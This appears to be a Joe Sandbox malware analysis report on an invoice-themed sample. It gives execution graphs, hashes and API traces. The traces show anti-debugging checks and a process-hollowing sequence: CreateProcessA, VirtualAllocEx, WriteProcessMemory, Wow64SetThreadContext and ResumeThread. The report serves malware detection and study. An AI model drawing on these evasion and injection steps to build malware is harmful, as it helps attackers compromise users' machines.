                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

Execution Coverage: 9.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 21.4%
Total number of Nodes: 14
Total number of Limit Nodes: 2
Execution graph nodes (node id: address, API called):
• 24606: 10170b0
• 24607: 10170f4, CheckRemoteDebuggerPresent
• 24608: 1017136
• 24609: 566cb70
• 24610: 566cba5
• 24611: 566cb7d
• 24613: 566cbc6
• 24615: 566cc8e, GlobalMemoryStatusEx
• 24616: 566ccbe
• 24617: 566c2e4
• 24618: 566cc48, GlobalMemoryStatusEx
• 24620: 566cbc2
• 24621: 566e998, DuplicateHandle
• 24622: 566ea2e
Execution graph edges: 24606->24607, 24607->24608, 24609->24610, 24609->24611, 24610->24617, 24615->24616, 24617->24618, 24618->24620, 24620->24613, 24620->24615, 24621->24622

                                                                                  Control-flow Graph

Control-flow graph blocks (block id: address range, API called):
• 1144: 10170b0-1017134, CheckRemoteDebuggerPresent
• 1146: 1017136-101713c
• 1147: 101713d-1017178
Control-flow graph edges: 1144->1146, 1144->1147, 1146->1147
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01017127
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2887713361.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1010000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

Control-flow graph blocks (block id: address range, call or API):
• 1107: 566cb70-566cb7b
• 1108: 566cba5-566cbc4, call 566c2e4
• 1109: 566cb7d-566cba4, call 566c2d8
• 1115: 566cbc6-566cbc9
• 1116: 566cbca-566cc29
• 1123: 566cc2f-566ccbc, GlobalMemoryStatusEx
• 1124: 566cc2b-566cc2e
• 1128: 566ccc5-566cced
• 1129: 566ccbe-566ccc4
Control-flow graph edges: 1107->1108, 1107->1109, 1108->1115, 1108->1116, 1116->1123, 1116->1124, 1123->1128, 1123->1129, 1129->1128
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1132 10170a8-1017134 CheckRemoteDebuggerPresent 1134 1017136-101713c 1132->1134 1135 101713d-1017178 1132->1135 1134->1135
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01017127
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2887713361.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1010000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 20b16ede8788145796c412a930b80cf176e4e3913d88ec0bc9d606fdbf25ead9
                                                                                  • Instruction ID: eafb7accf2dc6c86a5ee44561255f555efc6ab8ad31178c77b8de6cdac3ac6e4
                                                                                  • Opcode Fuzzy Hash: 20b16ede8788145796c412a930b80cf176e4e3913d88ec0bc9d606fdbf25ead9
                                                                                  • Instruction Fuzzy Hash: 122166B5800259CFCB10CFA9D484BEEBBF4EF49320F24846EE499A7251C338A944CF64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 1138 566e990-566e997 1139 566e998-566ea2c DuplicateHandle 1138->1139 1140 566ea35-566ea52 1139->1140 1141 566ea2e-566ea34 1139->1141 1141->1140
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0566EA1F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: e91bcca0fd7e684a7e795c19780690740691579a15ad82b2bfb34842e8ab939a
                                                                                  • Instruction ID: 408e271c979e21d7d4f4e4269218efe4a1964f464b1405e691dd6d8262023031
                                                                                  • Opcode Fuzzy Hash: e91bcca0fd7e684a7e795c19780690740691579a15ad82b2bfb34842e8ab939a
                                                                                  • Instruction Fuzzy Hash: 942116B5900258AFDB10CF9AD484ADEBFF8FB48320F14801AE918A7310C775A954CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 1150 566e998-566ea2c DuplicateHandle 1151 566ea35-566ea52 1150->1151 1152 566ea2e-566ea34 1150->1152 1152->1151
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0566EA1F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: cb4df0a88c037f804353220ee5b62835c7fa598322cb81ef827dc80bf1a82d63
                                                                                  • Instruction ID: 5c53d643b5697d0b0dd2a383a0d22c702ff5c238f2f0ccecc95a428182b26db9
                                                                                  • Opcode Fuzzy Hash: cb4df0a88c037f804353220ee5b62835c7fa598322cb81ef827dc80bf1a82d63
                                                                                  • Instruction Fuzzy Hash: 1321E2B59002489FDB10CFAAD984ADEBBF8FB48320F14801AE918A3310D375A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 1155 566cc42-566cc86 1157 566cc8e-566ccbc GlobalMemoryStatusEx 1155->1157 1158 566ccc5-566cced 1157->1158 1159 566ccbe-566ccc4 1157->1159 1159->1158
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0566CBC2), ref: 0566CCAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemoryStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1890195054-0
                                                                                  • Opcode ID: 43b401d9a443226c7a3a0a43441e34ab7d5ecc2e6db5f5cb91896cce5f5c0e28
                                                                                  • Instruction ID: 6cc81e06e9a5efca05f59a0a1f1320462f9003a75c5696bd74be8284c60141ef
                                                                                  • Opcode Fuzzy Hash: 43b401d9a443226c7a3a0a43441e34ab7d5ecc2e6db5f5cb91896cce5f5c0e28
                                                                                  • Instruction Fuzzy Hash: C31112B1C006599BDB10CFAAC544BDEFBF4EF48324F14816AE858A7241D778A944CFE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 1162 566c2e4-566ccbc GlobalMemoryStatusEx 1165 566ccc5-566cced 1162->1165 1166 566ccbe-566ccc4 1162->1166 1166->1165
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0566CBC2), ref: 0566CCAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemoryStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1890195054-0
                                                                                  • Opcode ID: 21777d3a7eef594f0c9cba2f633f0e803f889b76ecce8fb5b83d54fc03549be7
                                                                                  • Instruction ID: afc0a919755cdc8228923f4036e516ed265ade8222e25019cf1568f2c1c656fa
                                                                                  • Opcode Fuzzy Hash: 21777d3a7eef594f0c9cba2f633f0e803f889b76ecce8fb5b83d54fc03549be7
                                                                                  • Instruction Fuzzy Hash: 711100B1C006599BDB10DF9AC544B9EFBF4EB48320F14816AE858B7251D378A944CFE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2887228267.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_f4d000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b4aa9455c60cd1848038d666bb28b6014065ebe4a4f3540c2035af10f539820a
                                                                                  • Instruction ID: c6d388ef794ca9add4df783fc331565b3419e10618d3d7ec7b619643f85b6d43
                                                                                  • Opcode Fuzzy Hash: b4aa9455c60cd1848038d666bb28b6014065ebe4a4f3540c2035af10f539820a
                                                                                  • Instruction Fuzzy Hash: 6C212B7150D3C09FD703CB24D994711BF71AB46224F29C5EBD8898F2A7C23A985ADB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2887228267.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_f4d000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8ac40e3794da94eb821f7d0594104b7cb0f661ddb08441fe1dde547cf5661d07
                                                                                  • Instruction ID: 80d8dd36eb8abbfb9d24b7a13b6d5fb5f0737f920d0d6443f65277845ee59653
                                                                                  • Opcode Fuzzy Hash: 8ac40e3794da94eb821f7d0594104b7cb0f661ddb08441fe1dde547cf5661d07
                                                                                  • Instruction Fuzzy Hash: 7A210471604204DFDB14DF18D9C0B26BFA5FB84324F24C56DED0A4B29AC37AD847DA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:10.9%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:184
                                                                                  Total number of Limit Nodes:12
                                                                                  execution_graph 22985 4504900 22986 4504ac0 22985->22986 22989 4504926 22985->22989 22987 4504a8b 22987->22987 22989->22987 22990 4502d70 22989->22990 22991 4504b80 PostMessageW 22990->22991 22992 4504bec 22991->22992 22992->22989 22993 231e860 22994 231e8a6 22993->22994 22997 231ea40 22994->22997 23000 231e5d8 22997->23000 23001 231eaa8 DuplicateHandle 23000->23001 23002 231e993 23001->23002 23032 231c7c0 23033 231c802 23032->23033 23034 231c808 GetModuleHandleW 23032->23034 23033->23034 23035 231c835 23034->23035 22794 4501695 22795 450158c 22794->22795 22796 450159b 22795->22796 22801 4503716 22795->22801 22818 45036a0 22795->22818 22834 45036b0 22795->22834 22850 4503630 22795->22850 22802 45036a4 22801->22802 22804 4503719 22801->22804 22803 45036d2 22802->22803 22867 4503aaf 22802->22867 22874 4503b0b 22802->22874 22879 4504026 22802->22879 22884 4503c45 22802->22884 22888 4504223 22802->22888 22893 4504101 22802->22893 22898 45041df 22802->22898 22903 4503fde 22802->22903 22911 450413a 22802->22911 22915 4503b3a 22802->22915 22923 4504039 22802->22923 22928 4503ff5 22802->22928 22933 450432f 22802->22933 22803->22795 22804->22795 22819 45036ca 22818->22819 22820 4503ff5 2 API calls 22819->22820 22821 4504039 2 API calls 22819->22821 22822 4503b3a 4 API calls 22819->22822 22823 450413a 2 API calls 22819->22823 22824 4503fde 4 API calls 22819->22824 22825 45041df 2 API calls 22819->22825 22826 4504101 2 API calls 22819->22826 22827 4504223 2 API calls 22819->22827 22828 4503c45 2 API calls 22819->22828 22829 4504026 2 API calls 22819->22829 22830 4503b0b 2 API calls 22819->22830 22831 4503aaf 4 API calls 22819->22831 22832 45036d2 22819->22832 22833 450432f 2 API calls 22819->22833 22820->22832 22821->22832 22822->22832 22823->22832 22824->22832 22825->22832 22826->22832 22827->22832 22828->22832 22829->22832 22830->22832 22831->22832 22832->22795 22833->22832 22835 45036ca 
22834->22835 22836 45036d2 22835->22836 22837 4503ff5 2 API calls 22835->22837 22838 4504039 2 API calls 22835->22838 22839 4503b3a 4 API calls 22835->22839 22840 450413a 2 API calls 22835->22840 22841 4503fde 4 API calls 22835->22841 22842 45041df 2 API calls 22835->22842 22843 4504101 2 API calls 22835->22843 22844 4504223 2 API calls 22835->22844 22845 4503c45 2 API calls 22835->22845 22846 4504026 2 API calls 22835->22846 22847 4503b0b 2 API calls 22835->22847 22848 4503aaf 4 API calls 22835->22848 22849 450432f 2 API calls 22835->22849 22836->22795 22837->22836 22838->22836 22839->22836 22840->22836 22841->22836 22842->22836 22843->22836 22844->22836 22845->22836 22846->22836 22847->22836 22848->22836 22849->22836 22851 45036a8 22850->22851 22852 450364d 22850->22852 22853 4503ff5 2 API calls 22851->22853 22854 4504039 2 API calls 22851->22854 22855 4503b3a 4 API calls 22851->22855 22856 450413a 2 API calls 22851->22856 22857 4503fde 4 API calls 22851->22857 22858 45041df 2 API calls 22851->22858 22859 4504101 2 API calls 22851->22859 22860 4504223 2 API calls 22851->22860 22861 4503c45 2 API calls 22851->22861 22862 4504026 2 API calls 22851->22862 22863 4503b0b 2 API calls 22851->22863 22864 4503aaf 4 API calls 22851->22864 22865 45036d2 22851->22865 22866 450432f 2 API calls 22851->22866 22852->22795 22853->22865 22854->22865 22855->22865 22856->22865 22857->22865 22858->22865 22859->22865 22860->22865 22861->22865 22862->22865 22863->22865 22864->22865 22865->22795 22866->22865 22937 4501170 22867->22937 22941 4501164 22867->22941 22875 4503b14 22874->22875 22876 4503b26 22875->22876 22945 4500ee0 22875->22945 22949 4500ee8 22875->22949 22876->22803 22880 4503ffc 22879->22880 22953 4500ca0 22880->22953 22957 4500c98 22880->22957 22881 4504506 22886 4500ee0 WriteProcessMemory 22884->22886 22887 4500ee8 WriteProcessMemory 22884->22887 22885 4503b66 22885->22803 22886->22885 22887->22885 22889 4503b14 22888->22889 22890 4503b26 22889->22890 22891 4500ee0 
WriteProcessMemory 22889->22891 22892 4500ee8 WriteProcessMemory 22889->22892 22890->22803 22891->22889 22892->22889 22894 450410e 22893->22894 22896 4500ca0 ResumeThread 22894->22896 22897 4500c98 ResumeThread 22894->22897 22895 4504506 22896->22895 22897->22895 22899 4503b14 22898->22899 22899->22898 22900 4503b26 22899->22900 22901 4500ee0 WriteProcessMemory 22899->22901 22902 4500ee8 WriteProcessMemory 22899->22902 22900->22803 22901->22899 22902->22899 22904 450407a 22903->22904 22905 4503ffc 22903->22905 22961 4500d50 22904->22961 22965 4500d48 22904->22965 22907 4500ca0 ResumeThread 22905->22907 22908 4500c98 ResumeThread 22905->22908 22906 4504506 22907->22906 22908->22906 22969 4500e20 22911->22969 22973 4500e28 22911->22973 22912 450415b 22912->22803 22916 45040b4 22915->22916 22921 4500d50 Wow64SetThreadContext 22916->22921 22922 4500d48 Wow64SetThreadContext 22916->22922 22917 4503b14 22918 4503b26 22917->22918 22919 4500ee0 WriteProcessMemory 22917->22919 22920 4500ee8 WriteProcessMemory 22917->22920 22918->22803 22919->22917 22920->22917 22921->22917 22922->22917 22977 4500fd0 22923->22977 22981 4500fd8 22923->22981 22924 450401a 22924->22923 22925 4503c0f 22924->22925 22925->22803 22929 4503ffb 22928->22929 22931 4500ca0 ResumeThread 22929->22931 22932 4500c98 ResumeThread 22929->22932 22930 4504506 22931->22930 22932->22930 22935 4500ee0 WriteProcessMemory 22933->22935 22936 4500ee8 WriteProcessMemory 22933->22936 22934 450435d 22935->22934 22936->22934 22938 45011f9 CreateProcessA 22937->22938 22940 45013bb 22938->22940 22942 45011f9 CreateProcessA 22941->22942 22944 45013bb 22942->22944 22946 4500f30 WriteProcessMemory 22945->22946 22948 4500f87 22946->22948 22948->22875 22950 4500f30 WriteProcessMemory 22949->22950 22952 4500f87 22950->22952 22952->22875 22954 4500ce0 ResumeThread 22953->22954 22956 4500d11 22954->22956 22956->22881 22958 4500ca0 ResumeThread 22957->22958 22960 4500d11 22958->22960 22960->22881 22962 4500d95 Wow64SetThreadContext 
22961->22962 22964 4500ddd 22962->22964 22964->22905 22966 4500d50 Wow64SetThreadContext 22965->22966 22968 4500ddd 22966->22968 22968->22905 22970 4500e68 VirtualAllocEx 22969->22970 22972 4500ea5 22970->22972 22972->22912 22974 4500e68 VirtualAllocEx 22973->22974 22976 4500ea5 22974->22976 22976->22912 22978 4500fd8 ReadProcessMemory 22977->22978 22980 4501067 22978->22980 22980->22924 22982 4501023 ReadProcessMemory 22981->22982 22984 4501067 22982->22984 22984->22924 23003 231c868 23004 231c87c 23003->23004 23005 231c8a1 23004->23005 23007 231c280 23004->23007 23008 231ca48 LoadLibraryExW 23007->23008 23010 231cac1 23008->23010 23010->23005 23011 23147e8 23013 2314804 23011->23013 23012 231487e 23013->23012 23015 23149b0 23013->23015 23016 23149d5 23015->23016 23020 2314ac0 23016->23020 23024 2314aaf 23016->23024 23022 2314ae7 23020->23022 23021 2314bc4 23021->23021 23022->23021 23028 2314660 23022->23028 23025 2314ae7 23024->23025 23026 2314bc4 23025->23026 23027 2314660 CreateActCtxA 23025->23027 23027->23026 23029 2315b50 CreateActCtxA 23028->23029 23031 2315c13 23029->23031 23031->23031

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 294 68704ff 295 6870504-6870507 294->295 296 6870519-687051d 295->296 297 6870509 295->297 309 6870540 296->309 310 687051f-6870528 296->310 297->296 298 6870837-6870840 297->298 299 68707a5-68707a9 297->299 300 6870642-687066b 297->300 301 6870721-6870726 297->301 302 6870820-6870834 297->302 303 68706ee-68706f6 297->303 304 687066e-6870673 297->304 305 68706fb-687070e 297->305 306 687072b-687073e 297->306 307 68705bb-68705bf 297->307 308 6870678-687068b 297->308 313 68707cc 299->313 314 68707ab-68707b4 299->314 300->304 301->295 303->295 304->295 341 6870710 305->341 342 687071a-687071f 305->342 332 6870761 306->332 333 6870740-6870749 306->333 311 68705e2 307->311 312 68705c1-68705ca 307->312 334 6870843 308->334 335 6870691-68706a6 308->335 317 6870543-6870545 309->317 315 687052f-687053c 310->315 316 687052a-687052d 310->316 319 68705e5-68705e9 311->319 327 68705d1-68705de 312->327 328 68705cc-68705cf 312->328 325 68707cf-68707ea 313->325 320 68707b6-68707b9 314->320 321 68707bb-68707c8 314->321 324 687053e 315->324 316->324 329 6870547-687054d 317->329 330 687055d-68705a6 317->330 337 68705ff 319->337 338 68705eb-68705fd 319->338 339 68707ca 320->339 321->339 324->317 370 68707ec-68707f6 325->370 371 6870808-6870812 325->371 336 68705e0 327->336 328->336 343 6870551-687055b 329->343 344 687054f 329->344 389 68705a8 call 6871596 330->389 390 68705a8 call 6871734 330->390 391 68705a8 call 6871608 330->391 392 68705a8 call 6871618 330->392 349 6870764-6870770 332->349 346 6870750-687075d 333->346 347 687074b-687074e 333->347 334->334 360 68706c4 335->360 361 68706a8-68706ae 335->361 336->319 351 6870602-6870630 337->351 338->351 339->325 354 6870715 341->354 342->354 343->330 344->330 356 687075f 346->356 347->356 367 6870772-6870778 349->367 368 6870788-6870792 349->368 351->334 386 6870636-687063d 351->386 354->295 356->349 369 68706c6-68706c8 360->369 365 
68706b4-68706c0 361->365 366 68706b0-68706b2 361->366 374 68706c2 365->374 366->374 375 687077c-687077e 367->375 376 687077a 367->376 368->334 377 6870798-68707a0 368->377 378 68706d6-68706e9 369->378 379 68706ca-68706d0 369->379 370->334 381 68707f8-68707fe 370->381 371->334 372 6870814-687081e 371->372 382 6870803 372->382 374->369 375->368 376->368 377->295 378->295 384 68706d4 379->384 385 68706d2 379->385 381->382 382->295 384->378 385->378 386->295 387 68705ae-68705b6 387->295 389->387 390->387 391->387 392->387
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                  • API String ID: 0-1437089595
                                                                                  • Opcode ID: 0ecea089f152ba367346884f49965385f2be5a4e074da5d292c68747ed566361
                                                                                  • Instruction ID: 8d8f4764879ca6eb58e8d632de5add7b26a84fdff552a744bf564b1c0d58a49b
                                                                                  • Opcode Fuzzy Hash: 0ecea089f152ba367346884f49965385f2be5a4e074da5d292c68747ed566361
                                                                                  • Instruction Fuzzy Hash: 03918CB4E0421CCFDB58CA98D955A6EB7B2BB80744F248516E502EF399CB71DC86CF81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

Control-flow Graph: basic blocks 4501164-45014b5, call to CreateProcessA (graph rendering not captured)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 045013A6
Memory Dump Source
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 6adf9cda5cd61773ec97c286c6a4f09b599d225f42d33efcd8da864340d6ee0b
• Instruction ID: 2b37d2178d2f09f57f79d83596a12d00cf46388ccec82c4dc5db85dd6c3139d8
• Opcode Fuzzy Hash: 6adf9cda5cd61773ec97c286c6a4f09b599d225f42d33efcd8da864340d6ee0b
• Instruction Fuzzy Hash: C5A1A071D0061ADFDB20CFA9D8417EDBBB2BF44314F0481A9E848E7290DB75A985DF92
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 4501170-45014b5, call to CreateProcessA (graph rendering not captured)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 045013A6
Memory Dump Source
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: bc0c527aecf35f35d26bc089dbf79587ccc11f824ca9f874303b3878a1ff24f9
• Instruction ID: 2675679993607f9b0591592fed31315e758711ddb59798c498f2854ff0ce6aa5
• Opcode Fuzzy Hash: bc0c527aecf35f35d26bc089dbf79587ccc11f824ca9f874303b3878a1ff24f9
• Instruction Fuzzy Hash: C3919E71D0061ADFDB20CFA9D8417EDBBB2BF44314F0481A9E848E7290DB75A985DF92
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 2314660-2315c99, call to CreateActCtxA (graph rendering not captured)
APIs
• CreateActCtxA.KERNEL32(?), ref: 02315C01
Memory Dump Source
• Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 073b72ec002ee950a03356538872c475b2c59886fad6971c4ffaa04bb629786f
• Instruction ID: 35da8440e8ab5521bd4997bb7d920ee1b5413baef792c0189f6efcb320457a87
• Opcode Fuzzy Hash: 073b72ec002ee950a03356538872c475b2c59886fad6971c4ffaa04bb629786f
• Instruction Fuzzy Hash: D941DFB0C00619CFDB28DFA9C944B9EBBF5BF88304F64806AD408AB255DBB56945CF90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 2315b45-2315c99, call to CreateActCtxA (graph rendering not captured)
APIs
• CreateActCtxA.KERNEL32(?), ref: 02315C01
Memory Dump Source
• Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 11e0ed44bf5ed038bf467937a289a28b59967ee1fa68051867c171a68ec1254e
• Instruction ID: ff7d1f04799b1fb39f384a40a4f183a689edb2cc934a218b2a91624e45b8ca93
• Opcode Fuzzy Hash: 11e0ed44bf5ed038bf467937a289a28b59967ee1fa68051867c171a68ec1254e
• Instruction Fuzzy Hash: 0F41C3B4C00619CFDB24DFA9C984BDEBBF5BF89304F24806AD408AB255DB756946CF90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 4500ee0-4500fbe, call to WriteProcessMemory (graph rendering not captured)
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04500F78
Memory Dump Source
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: e27a74ae378b712b280d280643198956f39f1e161d4ec4a2005c2d3531681bfe
• Instruction ID: 8a37782e44e2785cdb4b2691dbcebf6ab3a903ea7a0c3eb2715568a02298e39c
• Opcode Fuzzy Hash: e27a74ae378b712b280d280643198956f39f1e161d4ec4a2005c2d3531681bfe
• Instruction Fuzzy Hash: B6216BB590030D9FCB10CFA9D985BDEBBF5FF48310F108429E958A7250C778A544DBA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 4500ee8-4500fbe, call to WriteProcessMemory (graph rendering not captured)
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04500F78
Memory Dump Source
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: eccb6cb8ea3e848d102d24d89356e9e483d2ea80b29736a16ec1f8771df4de9c
• Instruction ID: ff8e715db2c8b4af7625068786e275f0698d985ffeca66bcc2d8252079de5c47
• Opcode Fuzzy Hash: eccb6cb8ea3e848d102d24d89356e9e483d2ea80b29736a16ec1f8771df4de9c
• Instruction Fuzzy Hash: F12169B59003099FCB10CFAAC981BDEBBF5FF48310F108429E958A7290C778A944DBA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 4500d48-4500e14, call to Wow64SetThreadContext (graph rendering not captured)
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04500DCE
Memory Dump Source
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
Joe Sandbox IDA Plugin
